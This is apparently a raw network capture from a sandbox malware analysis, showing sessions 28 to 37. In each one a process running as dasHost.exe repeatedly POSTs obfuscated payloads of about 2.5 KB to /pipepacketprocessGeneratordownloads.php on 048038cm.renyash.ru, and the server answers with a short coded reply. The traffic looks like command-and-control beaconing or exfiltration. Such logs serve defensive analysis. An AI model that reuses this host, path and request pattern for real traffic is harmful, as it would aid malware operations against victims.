                                                                        Dec 28, 2024 20:43:28.765451908 CET | 806 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:28 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MgXqnTcWH8yW9anG4IyOOj8g%2BlRKUYt8i3bUmJgAIjo8ZW5iM7fohi9W516SUg35V%2FtAm4vGUBmwt7DLyr%2FfBwqvjA9d%2BEd4oH4QKs5gp6HnLH9VsER2NlcQBo918p6THlqsbrCx"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a1a5b388cb4-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3759&min_rtt=1913&rtt_var=4411&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=87493&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        28 | 192.168.2.4 | 49820 | 104.21.38.84 | 80 | 8628 | C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:43:29.235821009 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:29.594844103 CET | 2584 | OUT | Data Raw: 56 5b 59 51 56 48 55 5f 5d 5f 52 56 5a 5d 58 59 57 5d 5f 5a 54 52 55 48 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: V[YQVHU_]_RVZ]XYW]_ZTRUHR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX'+: +4#58;;'[!.**$ *7U)(:5<*%\ ![(3
                                                                        Dec 28, 2024 20:43:30.366914988 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:30.617439032 CET | 806 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:30 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cxIP3emVq3MFn66dnbVy1GT6cZA%2FxE3Q32zG%2Bz8IWrZ73YnH12XWno5O33SOqHUwXRh0phGnG6d3ecxJpTxhJERHohdsFmoZL1qG5%2BuxYSnEtrbfijzJvzRiiEp%2FytHQsl6etfRi"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a25dd8ede94-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3498&min_rtt=1450&rtt_var=4640&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=81861&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        29 | 192.168.2.4 | 49822 | 104.21.38.84 | 80 | 8628 | C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:43:30.879215956 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2580
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:31.235578060 CET | 2580 | OUT | Data Raw: 56 55 5c 51 56 45 55 58 5d 5f 52 56 5a 58 58 5a 57 5e 5f 5b 54 53 55 44 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VU\QVEUX]_RVZXXZW^_[TSUDR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX'?<=] +#<Y/+7[4.).$ 97><-946 ?><%\ ![(?
                                                                        Dec 28, 2024 20:43:32.057957888 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:32.313186884 CET | 812 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:32 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZJzJLrE%2FTVFOUSov8M6MSI12Js%2BGUlF28mVuMJVprdVYgTbKYrJVk%2FJ%2B%2FoSPkB7W6zji6SVyyRnPetm%2FQn%2B8YedJ0FlWRrCTRW8LBlKhZWCaiamyjkWM8qjstFO8nyJo5jeWPN0b"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a305e245e7d-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4463&min_rtt=1670&rtt_var=6213&sent=4&recv=8&lost=0&retrans=0&sent_bytes=25&recv_bytes=2886&delivery_rate=60790&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        30 | 192.168.2.4 | 49828 | 104.21.38.84 | 80 | 8628 | C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:43:32.733181000 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:33.079530954 CET | 2584 | OUT | Data Raw: 53 55 59 52 53 41 55 5b 5d 5f 52 56 5a 5c 58 5d 57 5f 5f 5e 54 50 55 44 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: SUYRSAU[]_RVZ\X]W__^TPUDR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$Z)?-]6 %,+#.:*;#=?;^-_75+[=%\ ![(7
                                                                        Dec 28, 2024 20:43:33.819001913 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:34.058556080 CET | 804 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:33 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KS4SJhABdmF4Ccm85MyqJvtFvRRAOq27kF4dBBk1DkDvE0g9g6N%2FdnYEPeAzUXuUv8KAjr4m0zUfiKvUFiP7E86F9w7DrqqHeojVJthiYX%2F1C8FtwMDWL%2FrenVe9aGG5kdGzReYE"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a3b684a8ce9-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4136&min_rtt=1988&rtt_var=5042&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=76136&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        31 | 192.168.2.4 | 49834 | 104.21.38.84 | 80 | 8628 | C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:43:34.307214022 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:34.657371998 CET | 2584 | OUT | Data Raw: 56 5a 59 53 53 44 55 5e 5d 5f 52 56 5a 5d 58 5c 57 5d 5f 59 54 55 55 40 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VZYSSDU^]_RVZ]X\W]_YTUU@R]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX'),!(Y75,+(4=!=#Q )<)<;.53$(,%\ ![(3
                                                                        Dec 28, 2024 20:43:35.485979080 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:35.737128019 CET | 802 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:35 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M1XXpj4ASl5xRxZ7pTtoTUtQaiYeEY33z5GXnJ2gBh4FW1gPFGmPZM7rjAFceGhP2LepDx2pOJk7s6GGnv%2Fd9EkASbN0u3HsJ7bDcUON%2BBM1OPyY6Spo6MhYVOKEbSohS5umHXFg"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a45cf880cb4-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3564&min_rtt=1598&rtt_var=4532&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=84246&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        32 | 192.168.2.4 | 49839 | 104.21.38.84 | 80 | 8628 | C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:43:35.978044987 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2580
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:36.329363108 CET | 2580 | OUT | Data Raw: 56 54 59 55 53 46 55 58 5d 5f 52 56 5a 58 58 58 57 5e 5f 51 54 5c 55 43 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VTYUSFUX]_RVZXXXW^_QT\UCR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$?Z1!<Z45 _,;,!.X+=44>Y?,:?[6)%\ ![(7
                                                                        Dec 28, 2024 20:43:37.801753044 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:38.107362986 CET | 808 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:37 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G9oYFV42a06S45GoHNd9YECk2gHpHIZGFVR%2FSVRjEk8Qtx2KtiOiEeZhifZbkLGF3H4q0cjTlq4ONbRcaIXk2JazLmuajDMD9fnfY%2BYAMOTI1wM9RmvoCiYMD6%2F27dAWXmOTxpAp"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a5378f243ad-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=109913&min_rtt=100580&rtt_var=56384&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2886&delivery_rate=8331&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        33 | 192.168.2.4 | 49841 | 104.21.38.84 | 80 | 8628 | C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:43:38.354841948 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:38.704314947 CET | 2584 | OUT | Data Raw: 56 57 59 54 53 42 50 59 5d 5f 52 56 5a 5d 58 5b 57 5e 5f 5c 54 53 55 46 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VWYTSBPY]_RVZ]X[W^_\TSUFR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$Y+?15+7%,-+X >>-( ?P=/,:_4!0=,%\ ![(3
                                                                        Dec 28, 2024 20:43:39.848402023 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:40.133791924 CET | 804 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:39 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OrZQGy9wG1xxHsBDIDQRfmKsyv5sOy1VUKJgUNsqSchVpr3hLUxUoGNSQ6izsPxhqg7J7x0GgTUvfttxT8edKzMgRU1h%2FkFd4VWnqRC4OQDZTohqgrexMo4il5CByr%2FrCQ43X9uX"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a605fc818b8-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=81278&min_rtt=68551&rtt_var=51161&sent=5&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=8569&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        34 | 192.168.2.4 | 49847 | 104.21.38.84 | 80 | 8628 | C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:43:40.370738983 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:40.719938040 CET | 2584 | OUT | Data Raw: 56 55 59 55 53 45 55 5f 5d 5f 52 56 5a 5c 58 5a 57 5b 5f 5e 54 52 55 48 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VUYUSEU_]_RVZ\XZW[_^TRUHR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$_("6? (/4.*)379#P=-!8)%\ ![(7
                                                                        Dec 28, 2024 20:43:41.547317028 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:41.805100918 CET | 808 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:41 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uegMpLE5Q5kxSmA%2FdEAz%2BHAaDDZRtrAGJtEOHlTwvZupf7mCgRkKHJI034J3BkhqHWOiuqouqHBw4SowtXQHNxHrgWa%2FaK0lZaKW3b%2BMQ2i0EOMwa%2BMl7akPkmDSk3WCXWZSaGFE"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a6baa5e0f85-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3634&min_rtt=1468&rtt_var=4883&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=77663&cwnd=203&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        35 | 192.168.2.4 | 49853 | 104.21.38.84 | 80 | 8628 | C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:43:42.042717934 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2580
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:42.391854048 CET | 2580 | OUT | Data Raw: 56 50 59 5e 56 42 55 5c 5d 5f 52 56 5a 58 58 5e 57 59 5f 58 54 5d 55 49 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VPY^VBU\]_RVZXX^WY_XT]UIR]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$^?Z9[588^"5;; ="*##)/+_-)'Y!V8>%\ ![(/
                                                                        Dec 28, 2024 20:43:43.127501011 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:43.369401932 CET | 817 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:43 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BAH%2FF%2F75vRt9GZbSGmLDKYoo%2BYxsQ%2FwMe0Btu5oz4ip%2BrGg3BLgF21%2FON0npzSiPDRHFwUocXiILsGzeq28eemjdhgp74Uh%2FlE7mWDCTnHgWPcrOt0H07z%2BYrUvyVQQQc0y5tP3%2B"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a75992c41e0-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3064&min_rtt=1652&rtt_var=3444&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2886&delivery_rate=112715&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        36 | 192.168.2.4 | 49858 | 104.21.38.84 | 80 | 8628 | C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 28, 2024 20:43:43.608306885 CET | 306 | OUT | POST /pipepacketprocessGeneratordownloads.php HTTP/1.1
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                        Host: 048038cm.renyash.ru
                                                                        Content-Length: 2584
                                                                        Expect: 100-continue
                                                                        Dec 28, 2024 20:43:43.954256058 CET | 2584 | OUT | Data Raw: 56 53 59 5f 53 41 55 58 5d 5f 52 56 5a 51 58 5a 57 50 5f 5c 54 52 55 40 52 5d 44 57 5e 5d 5a 53 42 59 51 45 59 5e 50 52 59 58 57 57 56 5c 5e 44 57 56 5b 5c 58 5b 56 53 54 52 52 55 57 5d 5f 58 5a 55 43 5a 5f 5f 5b 57 5b 59 59 53 5c 5d 59 51 5c 59
                                                                        Data Ascii: VSY_SAUX]_RVZQXZWP_\TRU@R]DW^]ZSBYQEY^PRYXWWV\^DWV[\X[VSTRRUW]_XZUCZ__[W[YYS\]YQ\YYUQET_VQ[Q]^V_X[FQ]UCYU[CXZ\AV[^^^Z[\RXY^ZUQAQZ\^SU[]UZ[SQR@[PURU^UURZ_SZX[XZY\[QFV_YZZX_]P\\Z\YYRFXZX$Z? ;<Y754/;34=, )/T(??9$# /_*<%\ ![(
                                                                        Dec 28, 2024 20:43:44.739018917 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                        Dec 28, 2024 20:43:44.987900019 CET | 801 | IN | HTTP/1.1 200 OK
                                                                        Date: Sat, 28 Dec 2024 19:43:44 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        cf-cache-status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DkaOdn7C7iveo2p19KAYN8iPG3%2Fc1nEqpIpzrIEzZ3iKEp48CdPPjY9TR4t7qP3l5gLxWsTwm24ZvgKPN0cybtPLv5deXEbUiBlzaZ4vRBoTD27dfpt2VId0RIuG5kBEaAXujvi0"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f940a7fab440fab-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2797&min_rtt=1634&rtt_var=2939&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2890&delivery_rate=133455&cwnd=187&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                        Data Raw: 34 0d 0a 32 52 5a 5a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 42RZZ0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        37 | 192.168.2.4 | 49860 | 104.21.38.84 | 80 | 8628 | C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe
